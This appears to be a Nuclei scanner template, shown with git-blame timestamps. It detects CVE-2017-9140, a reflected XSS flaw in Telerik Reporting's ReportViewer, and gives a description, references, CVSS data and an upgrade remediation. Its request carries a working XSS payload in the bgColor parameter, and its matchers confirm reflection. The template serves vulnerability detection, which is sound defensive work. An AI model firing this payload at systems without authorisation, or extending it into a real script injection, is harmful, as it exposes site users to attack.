2021-06-09 13:10:47 +00:00
id : CVE-2017-9140
info :
2021-06-09 16:07:22 +00:00
name : Reflected XSS - Telerik Reporting Module
2021-06-09 13:10:47 +00:00
author : dhiyaneshDk
severity : medium
2022-02-28 14:33:03 +00:00
description : Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to application version 11.0.17.406 (2017 SP2) or later.
2022-02-28 18:19:21 +00:00
reference :
2022-02-28 14:33:03 +00:00
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
2022-05-17 09:18:12 +00:00
- https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406)
2023-07-11 19:49:27 +00:00
- https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-9140
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.0021
2023-08-31 11:46:18 +00:00
epss-percentile : 0.58217
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : progress
product : telerik_reporting
tags : cve,cve2017,xss,telerik
2021-06-09 13:10:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-09 13:10:47 +00:00
- method : GET
path :
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
2021-06-09 16:07:22 +00:00
matchers-condition : and
2021-06-09 13:10:47 +00:00
matchers :
- type : word
words :
2021-06-09 16:07:22 +00:00
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
2021-06-09 13:10:47 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200